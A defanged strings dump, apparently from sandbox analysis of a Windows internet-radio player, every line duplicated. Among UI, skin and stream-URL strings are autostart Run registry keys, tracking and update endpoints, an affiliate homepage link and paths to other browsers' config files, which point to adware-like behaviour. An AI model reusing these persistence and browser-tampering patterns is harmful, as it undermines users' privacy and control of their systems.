u.jAh
t.HuZ
t.HuZ
xSSSh
xSSSh
FTPjKS
FTPjKS
FtPj;S
FtPj;S
C.PjRV
C.PjRV
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
GetProcessWindowStation
GetProcessWindowStation
portuguese-brazilian
portuguese-brazilian
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
operator
operator
windows936
windows936
windows932
windows932
windows874
windows874
windows1257
windows1257
windows1256
windows1256
windows1255
windows1255
windows1254
windows1254
windows1253
windows1253
windows1252
windows1252
windows1251
windows1251
windows1250
windows1250
Invalid or unsupported charset:
Invalid or unsupported charset:
%sData\user2.ini
%sData\user2.ini
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}
Software\Microsoft\Windows\CurrentVersion\Uninstall\{06F57725-D702-43A9-A8D4-40BB36C9B07F}
Unins.exe
Unins.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
hXXp://update.bianya.cc/stj.ashx
hXXp://update.bianya.cc/stj.ashx
AutoRunTipFrame.xml
AutoRunTipFrame.xml
FrmColor.xml
FrmColor.xml
\SysConfig.ini
\SysConfig.ini
FrmConfig.xml
FrmConfig.xml
Data\dh.ini
Data\dh.ini
ShowHideWindowKey
ShowHideWindowKey
ExitWindowKey
ExitWindowKey
tab_hotkey
tab_hotkey
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
BoxNews.exe
BoxNews.exe
"%s%s" -mini
"%s%s" -mini
"%s" -mini
"%s" -mini
%s\%s
%s\%s
favorfm.xml
favorfm.xml
channels.xml
channels.xml
E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/ptree_implementation.hpp
E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/ptree_implementation.hpp
E:\zhuyicheng\boost_1_53_0\boost/property_tree/xml_parser.hpp
E:\zhuyicheng\boost_1_53_0\boost/property_tree/xml_parser.hpp
E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/xml_parser_read_rapidxml.hpp
E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/xml_parser_read_rapidxml.hpp
E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/xml_parser_write.hpp
E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/xml_parser_write.hpp
E:\zhuyicheng\boost_1_53_0\boost/property_tree/string_path.hpp
E:\zhuyicheng\boost_1_53_0\boost/property_tree/string_path.hpp
FrmFeedBack.xml
FrmFeedBack.xml
hXXp://tongji.yinyue.fm/feedback/b.html
hXXp://tongji.yinyue.fm/feedback/b.html
Data/setup.ini
Data/setup.ini
FrmHotKeyTip.xml
FrmHotKeyTip.xml
HotKeyTipFrame
HotKeyTipFrame
hotkey
hotkey
d:d:d
d:d:d
FrmLrcChild.xml
FrmLrcChild.xml
FrmLrc.xml
FrmLrc.xml
Source Files\LrcFrame.cpp
Source Files\LrcFrame.cpp
BtnLogin
BtnLogin
yymusic05.exe
yymusic05.exe
hXXp://VVV.hao123.com/?tn=98868055_hao_pg
hXXp://VVV.hao123.com/?tn=98868055_hao_pg
hXXp://update.yinyue.fm/goUrl.html?
hXXp://update.yinyue.fm/goUrl.html?
Skin.rs
Skin.rs
Skin\mainframeshadow.png
Skin\mainframeshadow.png
hXXp://update.yinyue.fm/tj.ashx
hXXp://update.yinyue.fm/tj.ashx
Skin\progresstooltip.png
Skin\progresstooltip.png
__HotKeyTipWindow
__HotKeyTipWindow
__HotKeyTipClass
__HotKeyTipClass
Skin\hotkeytipbk.png
Skin\hotkeytipbk.png
adb.exe
adb.exe
aapt.exe
aapt.exe
apnews.exe
apnews.exe
FrmPlayer.xml
FrmPlayer.xml
60,8,100,118
60,8,100,118
60,24,100,134
60,24,100,134
Source Files\MainFrame.cpp
Source Files\MainFrame.cpp
file='suspensiontopa.png'
file='suspensiontopa.png'
file='suspensiontop.png'
file='suspensiontop.png'
file='suspensiontopahover.png'
file='suspensiontopahover.png'
file='btn-play.png' source='0,0,64,64'
file='btn-play.png' source='0,0,64,64'
file='btn-play.png' source='0,64,64,128'
file='btn-play.png' source='0,64,64,128'
file='btn-play.png' source='0,128,64,192'
file='btn-play.png' source='0,128,64,192'
file='lyrictoplay.png'
file='lyrictoplay.png'
pl_play.png
pl_play.png
file='btn-pause.png' source='0,0,64,64'
file='btn-pause.png' source='0,0,64,64'
file='btn-pause.png' source='0,64,64,128'
file='btn-pause.png' source='0,64,64,128'
file='btn-pause.png' source='0,128,64,192'
file='btn-pause.png' source='0,128,64,192'
file='play0520.png' source='0,0,35,20'
file='play0520.png' source='0,0,35,20'
file='play0520.png' source='0,20,35,40'
file='play0520.png' source='0,20,35,40'
file='play0520.png' source='0,40,35,59'
file='play0520.png' source='0,40,35,59'
pl_pause.png
pl_pause.png
file='loading0%d.png'
file='loading0%d.png'
-d:d:d
-d:d:d
-d:d
-d:d
file='play0520.png' source='0,0,35,20'
file='play0520.png' source='0,0,35,20'
file='play0520.png' source='0,20,35,40'
file='play0520.png' source='0,20,35,40'
file='play0520.png' source='0,40,35,59'
file='play0520.png' source='0,40,35,59'
file='bk.png'
file='bk.png'
lyriclikea2.png
lyriclikea2.png
lyriclike.png
lyriclike.png
lyriclikea.png
lyriclikea.png
MessageBox.xml
MessageBox.xml
Source Files\MusicPlayer.cpp
Source Files\MusicPlayer.cpp
hXXp://update.yinyue.fm/
hXXp://update.yinyue.fm/
(3-!0,1'8"5.*2$
(3-!0,1'8"5.*2$
Data\server.ini
Data\server.ini
Data\Version.ini
Data\Version.ini
appupdate/ver.txt
appupdate/ver.txt
PlayerUpdate.exe
PlayerUpdate.exe
FrmPlayList.xml
FrmPlayList.xml
FrmPopWnd.xml
FrmPopWnd.xml
WebBrowserEx
WebBrowserEx
hXXp://update.yinyue.fm/url.txt
hXXp://update.yinyue.fm/url.txt
FrmProgressToolTip.xml
FrmProgressToolTip.xml
%d:d
%d:d
hXXp://tongji.yinyue.fm/
hXXp://tongji.yinyue.fm/
a.ashx
a.ashx
00:00:00:00:00:00
00:00:00:00:00:00
%d-%d-%d %d:%d:%d
%d-%d-%d %d:%d:%d
icon/ccjs.ico
icon/ccjs.ico
icon/ie.ico
icon/ie.ico
Internet Explorer YyfmPlay.lnk
Internet Explorer YyfmPlay.lnk
icon\gouwu.ico
icon\gouwu.ico
hXXp://update.yinyue.fm//dh.txt
hXXp://update.yinyue.fm//dh.txt
icon\ccjs.ico
icon\ccjs.ico
icon\ie.ico
icon\ie.ico
X:X:X:X:X:X
X:X:X:X:X:X
//./%s
//./%s
Data/version.ini
Data/version.ini
2000-01-01
2000-01-01
2000-01-01 00:00:00
2000-01-01 00:00:00
Data/client.ini
Data/client.ini
Data/dh.ini
Data/dh.ini
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
Data/user2.ini
Data/user2.ini
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\TheWorld.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\TheWorld.exe
\TheWorld.ini
\TheWorld.ini
\Baidu\browser\config.ini
\Baidu\browser\config.ini
\SogouExplorer\config.xml
\SogouExplorer\config.xml
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Maxthon2
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Maxthon2
SharedAccount\Config\Config.ini
SharedAccount\Config\Config.ini
SetTipFrame.xml
SetTipFrame.xml
FrmSetWindowLrcFrame.xml
FrmSetWindowLrcFrame.xml
Source Files\SetWindowLrcFrame.cpp
Source Files\SetWindowLrcFrame.cpp
FrmSystemMenuFrame.xml
FrmSystemMenuFrame.xml
event_edit_keydown_eshowhide
event_edit_keydown_eshowhide
event_edit_keydown_eexit
event_edit_keydown_eexit
file='list_play.png' dest='6,6,24,24'
file='list_play.png' dest='6,6,24,24'
file='list_pause.png' dest='6,6,24,24'
file='list_pause.png' dest='6,6,24,24'
2-0-0|1-0-0
2-0-0|1-0-0
1-0-0|1-0-0
1-0-0|1-0-0
3-0-0|1-0-0
3-0-0|1-0-0
4-0-0|1-0-0
4-0-0|1-0-0
5-0-0|1-0-0
5-0-0|1-0-0
6-0-0|1-0-0
6-0-0|1-0-0
list_item.xml
list_item.xml
operation
operation
frmWindowLrc.xml
frmWindowLrc.xml
frmWindowLrcParent.xml
frmWindowLrcParent.xml
hXXp://VVV.9ku.com/lrc2/
hXXp://VVV.9ku.com/lrc2/
hXXp://VVV.9ku.com/fm/
hXXp://VVV.9ku.com/fm/
hXXp://img.9ku.com
hXXp://img.9ku.com
hXXp://mp3.9ku.com
hXXp://mp3.9ku.com
E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/json_parser_read.hpp
E:\zhuyicheng\boost_1_53_0\boost/property_tree/detail/json_parser_read.hpp
hXXp://player.kuwo.cn/webmusic/st/getMuiseDate?flag=3&r=&pd=
hXXp://player.kuwo.cn/webmusic/st/getMuiseDate?flag=3&r=&pd=
hXXp://fm.baidu.com/dev/api/?tn=playlist&id=
hXXp://fm.baidu.com/dev/api/?tn=playlist&id=
hXXp://music.baidu.com/data/music/fmlink?type=mp3&rate=320&songIds=
hXXp://music.baidu.com/data/music/fmlink?type=mp3&rate=320&songIds=
hXXp://fm.baidu.com
hXXp://fm.baidu.com
hXXp://pan.baidu.com
hXXp://pan.baidu.com
hXXp://live.hkuradio.com/radio2?download=1
hXXp://live.hkuradio.com/radio2?download=1
hXXp://imgs.diantai.ifeng.com/images/channelimg/update_uradio_new_yy.png
hXXp://imgs.diantai.ifeng.com/images/channelimg/update_uradio_new_yy.png
hXXp://live.hkuradio.com/radio1?download=1
hXXp://live.hkuradio.com/radio1?download=1
hXXp://imgs.diantai.ifeng.com/images/channelimg/update_uradio_new_zh.png
hXXp://imgs.diantai.ifeng.com/images/channelimg/update_uradio_new_zh.png
hXXp://live.3gv.ifeng.com/live/zhongwen?fmt=mp3_32k_mp3
hXXp://live.3gv.ifeng.com/live/zhongwen?fmt=mp3_32k_mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/ifeng_zwt_new.png
hXXp://imgs.diantai.ifeng.com/images/channelimg/ifeng_zwt_new.png
hXXp://live.3gv.ifeng.com/live/zixun?fmt=mp3_32k_mp3
hXXp://live.3gv.ifeng.com/live/zixun?fmt=mp3_32k_mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/ifeng_zxt_new.png
hXXp://imgs.diantai.ifeng.com/images/channelimg/ifeng_zxt_new.png
hXXp://live.3gv.ifeng.com/live/hongkong?fmt=mp3_32k_mp3
hXXp://live.3gv.ifeng.com/live/hongkong?fmt=mp3_32k_mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/ifeng_xgt_new.png
hXXp://imgs.diantai.ifeng.com/images/channelimg/ifeng_xgt_new.png
hXXp://moblive.rbc.cn/fm876.mp3
hXXp://moblive.rbc.cn/fm876.mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_wy_new.png
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_wy_new.png
hXXp://moblive.rbc.cn/fm1039.mp3
hXXp://moblive.rbc.cn/fm1039.mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgjt_new.png
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgjt_new.png
hXXp://moblive.rbc.cn/fm1006.mp3
hXXp://moblive.rbc.cn/fm1006.mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_xw_new.png
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_xw_new.png
hXXp://moblive.rbc.cn/am603.mp3
hXXp://moblive.rbc.cn/am603.mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bggs_new.png
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bggs_new.png
hXXp://moblive.rbc.cn/fm1025.mp3
hXXp://moblive.rbc.cn/fm1025.mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgty_new.png
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgty_new.png
hXXp://moblive.rbc.cn/am774.mp3
hXXp://moblive.rbc.cn/am774.mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgwy_new.png
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgwy_new.png
hXXp://moblive.rbc.cn/am927.mp3
hXXp://moblive.rbc.cn/am927.mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgaj_new.png
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgaj_new.png
hXXp://moblive.rbc.cn/fm1073.mp3
hXXp://moblive.rbc.cn/fm1073.mp3
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgcsfw_new.png
hXXp://imgs.diantai.ifeng.com/images/channelimg/bg_bgcsfw_new.png
hXXp://VVV.xiami.com/radio/play/type/6/oid/0
hXXp://VVV.xiami.com/radio/play/type/6/oid/0
libfm::fm_douban_impl::login
libfm::fm_douban_impl::login
hXXp://VVV.douban.com/j/app/login
hXXp://VVV.douban.com/j/app/login
&password=
&password=
hXXp://VVV.douban.com/j/app/radio/people?app_name=radio_desktop_win&version=100&user_id=
hXXp://VVV.douban.com/j/app/radio/people?app_name=radio_desktop_win&version=100&user_id=
hXXp://VVV.douban.com/j/app/radio/people?app_name=radio_desktop_win&version=100&type=
hXXp://VVV.douban.com/j/app/radio/people?app_name=radio_desktop_win&version=100&type=
hXXp://shopcgi.qqmusic.qq.com/fcgi-bin/shopsearch.fcg?out=json&value=
hXXp://shopcgi.qqmusic.qq.com/fcgi-bin/shopsearch.fcg?out=json&value=
"msg":
"msg":
_0.jpg
_0.jpg
hXXp://imgcache.qq.com/music/photo/album/
hXXp://imgcache.qq.com/music/photo/album/
hXXp://music.qq.com/miniportal/static/lyric/
hXXp://music.qq.com/miniportal/static/lyric/
libfm::fm_impl::get_song_url
libfm::fm_impl::get_song_url
libfm::fm_impl::login
libfm::fm_impl::login
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
GetAsyncKeyState
GetAsyncKeyState
RegisterHotKey
RegisterHotKey
UnregisterHotKey
UnregisterHotKey
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
RegDeleteKeyA
RegDeleteKeyA
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
RegOpenKeyA
RegOpenKeyA
RegCloseKey
RegCloseKey
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
avcore.dll
avcore.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
gdiplus.dll
gdiplus.dll
?OnKeyDown@WindowImplBase@DuiLib@@UAEJIIJAAH@Z
?OnKeyDown@WindowImplBase@DuiLib@@UAEJIIJAAH@Z
?GetMessageMap@WindowImplBase@DuiLib@@MBEPBUDUI_MSGMAP@2@XZ
?GetMessageMap@WindowImplBase@DuiLib@@MBEPBUDUI_MSGMAP@2@XZ
?SetAutoNavigation@CWebBrowserUI@DuiLib@@QAEX_N@Z
?SetAutoNavigation@CWebBrowserUI@DuiLib@@QAEX_N@Z
?SetHomePage@CWebBrowserUI@DuiLib@@QAEXPBD@Z
?SetHomePage@CWebBrowserUI@DuiLib@@QAEXPBD@Z
?Download@CWebBrowserUI@DuiLib@@UAGJPAUIMoniker@@PAUIBindCtx@@KJPAU_tagBINDINFO@@PB_W3I@Z
?Download@CWebBrowserUI@DuiLib@@UAGJPAUIMoniker@@PAUIBindCtx@@KJPAU_tagBINDINFO@@PB_W3I@Z
?Exec@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KKPAUtagVARIANT@@1@Z
?Exec@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KKPAUtagVARIANT@@1@Z
?QueryStatus@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KQAU_tagOLECMD@@PAU_tagOLECMDTEXT@@@Z
?QueryStatus@CWebBrowserUI@DuiLib@@UAGJPBU_GUID@@KQAU_tagOLECMD@@PAU_tagOLECMDTEXT@@@Z
?QueryService@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@0PAPAX@Z
?QueryService@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@0PAPAX@Z
?FilterDataObject@CWebBrowserUI@DuiLib@@UAGJPAUIDataObject@@PAPAU3@@Z
?FilterDataObject@CWebBrowserUI@DuiLib@@UAGJPAUIDataObject@@PAPAU3@@Z
?TranslateUrl@CWebBrowserUI@DuiLib@@UAGJKPA_WPAPA_W@Z
?TranslateUrl@CWebBrowserUI@DuiLib@@UAGJKPA_WPAPA_W@Z
?GetDropTarget@CWebBrowserUI@DuiLib@@UAGJPAUIDropTarget@@PAPAU3@@Z
?GetDropTarget@CWebBrowserUI@DuiLib@@UAGJPAUIDropTarget@@PAPAU3@@Z
?GetOptionKeyPath@CWebBrowserUI@DuiLib@@UAGJPAPA_WK@Z
?GetOptionKeyPath@CWebBrowserUI@DuiLib@@UAGJPAPA_WK@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAGJPAUtagMSG@@PBU_GUID@@K@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAGJPAUtagMSG@@PBU_GUID@@K@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAEJPAUtagMSG@@@Z
?TranslateAcceleratorA@CWebBrowserUI@DuiLib@@UAEJPAUtagMSG@@@Z
?ResizeBorder@CWebBrowserUI@DuiLib@@UAGJPBUtagRECT@@PAUIOleInPlaceUIWindow@@H@Z
?ResizeBorder@CWebBrowserUI@DuiLib@@UAGJPBUtagRECT@@PAUIOleInPlaceUIWindow@@H@Z
?OnFrameWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?OnFrameWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?OnDocWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?OnDocWindowActivate@CWebBrowserUI@DuiLib@@UAGJH@Z
?EnableModeless@CWebBrowserUI@DuiLib@@UAGJH@Z
?EnableModeless@CWebBrowserUI@DuiLib@@UAGJH@Z
?UpdateUI@CWebBrowserUI@DuiLib@@UAGJXZ
?UpdateUI@CWebBrowserUI@DuiLib@@UAGJXZ
?HideUI@CWebBrowserUI@DuiLib@@UAGJXZ
?HideUI@CWebBrowserUI@DuiLib@@UAGJXZ
?ShowUI@CWebBrowserUI@DuiLib@@UAGJKPAUIOleInPlaceActiveObject@@PAUIOleCommandTarget@@PAUIOleInPlaceFrame@@PAUIOleInPlaceUIWindow@@@Z
?ShowUI@CWebBrowserUI@DuiLib@@UAGJKPAUIOleInPlaceActiveObject@@PAUIOleCommandTarget@@PAUIOleInPlaceFrame@@PAUIOleInPlaceUIWindow@@@Z
?GetHostInfo@CWebBrowserUI@DuiLib@@UAGJPAU_DOCHOSTUIINFO@@@Z
?GetHostInfo@CWebBrowserUI@DuiLib@@UAGJPAU_DOCHOSTUIINFO@@@Z
?ShowContextMenu@CWebBrowserUI@DuiLib@@UAGJKPAUtagPOINT@@PAUIUnknown@@PAUIDispatch@@@Z
?ShowContextMenu@CWebBrowserUI@DuiLib@@UAGJKPAUtagPOINT@@PAUIUnknown@@PAUIDispatch@@@Z
?Invoke@CWebBrowserUI@DuiLib@@UAGJJABU_GUID@@KGPAUtagDISPPARAMS@@PAUtagVARIANT@@PAUtagEXCEPINFO@@PAI@Z
?Invoke@CWebBrowserUI@DuiLib@@UAGJJABU_GUID@@KGPAUtagDISPPARAMS@@PAUtagVARIANT@@PAUtagEXCEPINFO@@PAI@Z
?GetIDsOfNames@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPA_WIKPAJ@Z
?GetIDsOfNames@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPA_WIKPAJ@Z
?GetTypeInfo@CWebBrowserUI@DuiLib@@UAGJIKPAPAUITypeInfo@@@Z
?GetTypeInfo@CWebBrowserUI@DuiLib@@UAGJIKPAPAUITypeInfo@@@Z
?GetTypeInfoCount@CWebBrowserUI@DuiLib@@UAGJPAI@Z
?GetTypeInfoCount@CWebBrowserUI@DuiLib@@UAGJPAI@Z
?QueryInterface@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPAX@Z
?QueryInterface@CWebBrowserUI@DuiLib@@UAGJABU_GUID@@PAPAX@Z
?Release@CWebBrowserUI@DuiLib@@UAGKXZ
?Release@CWebBrowserUI@DuiLib@@UAGKXZ
?AddRef@CWebBrowserUI@DuiLib@@UAGKXZ
?AddRef@CWebBrowserUI@DuiLib@@UAGKXZ
?GetInterface@CWebBrowserUI@DuiLib@@UAEPAXPBD@Z
?GetInterface@CWebBrowserUI@DuiLib@@UAEPAXPBD@Z
?GetClass@CWebBrowserUI@DuiLib@@UBEPBDXZ
?GetClass@CWebBrowserUI@DuiLib@@UBEPBDXZ
??1CWebBrowserUI@DuiLib@@UAE@XZ
??1CWebBrowserUI@DuiLib@@UAE@XZ
??0CWebBrowserUI@DuiLib@@QAE@XZ
??0CWebBrowserUI@DuiLib@@QAE@XZ
?SetKeyboardEnabled@CControlUI@DuiLib@@UAEX_N@Z
?SetKeyboardEnabled@CControlUI@DuiLib@@UAEX_N@Z
?IsKeyboardEnabled@CControlUI@DuiLib@@UBE_NXZ
?IsKeyboardEnabled@CControlUI@DuiLib@@UBE_NXZ
?Navigate2@CWebBrowserUI@DuiLib@@QAEXPBD@Z
?Navigate2@CWebBrowserUI@DuiLib@@QAEXPBD@Z
DuiLib.dll
DuiLib.dll
PSAPI.DLL
PSAPI.DLL
IPHLPAPI.DLL
IPHLPAPI.DLL
NETAPI32.dll
NETAPI32.dll
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
zcÃ
zcÃ
.?AVCWebBrowserUI@DuiLib@@
.?AVCWebBrowserUI@DuiLib@@
.?AVCHotKeyTipFrameWnd@@
.?AVCHotKeyTipFrameWnd@@
.?AVCWebBrowserUIEx@@
.?AVCWebBrowserUIEx@@
.?AVWebBrowserEventSinker@@
.?AVWebBrowserEventSinker@@
.?AU?$grammar_helper@U?$grammar@U?$json_grammar@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@boost@@U?$parser_context@Unil_t@classic@spirit@boost@@@classic@spirit@4@@classic@spirit@boost@@U?$json_grammar@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@@impl@classic@spirit@boost@@
.?AU?$grammar_helper@U?$grammar@U?$json_grammar@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@boost@@U?$parser_context@Unil_t@classic@spirit@boost@@@classic@spirit@4@@classic@spirit@boost@@U?$json_grammar@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$alternative@V?$action@V?$chset@D@classic@spirit@boost@@Ua_escape@?$context@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$sequence@U?$chlit@D@classic@spirit@boost@@V?$action@U?$uint_parser@K$0BA@$03$03@classic@spirit@boost@@Ua_unicode@?$context@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@234@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
.?AU?$concrete_parser@U?$alternative@V?$action@V?$chset@D@classic@spirit@boost@@Ua_escape@?$context@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@classic@spirit@boost@@U?$sequence@U?$chlit@D@classic@spirit@boost@@V?$action@U?$uint_parser@K$0BA@$03$03@classic@spirit@boost@@Ua_unicode@?$context@V?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@@json_parser@property_tree@4@@234@@234@@classic@spirit@boost@@V?$scanner@V?$_Vector_iterator@V?$_Vector_val@DV?$allocator@D@std@@@std@@@std@@U?$scanner_policies@U?$no_skipper_iteration_policy@V?$skip_parser_iteration_policy@U?$alternative@U?$alternative@Uspace_parser@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@U?$alternative@Ueol_parser@classic@spirit@boost@@Uend_parser@234@@234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@U?$confix_parser@V?$strlit@PBD@classic@spirit@boost@@U?$kleene_star@Uanychar_parser@classic@spirit@boost@@@234@V1234@Uunary_parser_category@234@Unon_nested@234@Uis_lexeme@234@@234@@classic@spirit@boost@@Uiteration_policy@234@@classic@spirit@boost@@@classic@spirit@boost@@Umatch_policy@234@Uaction_policy@234@@classic@spirit@boost@@@234@Unil_t@234@@impl@classic@spirit@boost@@
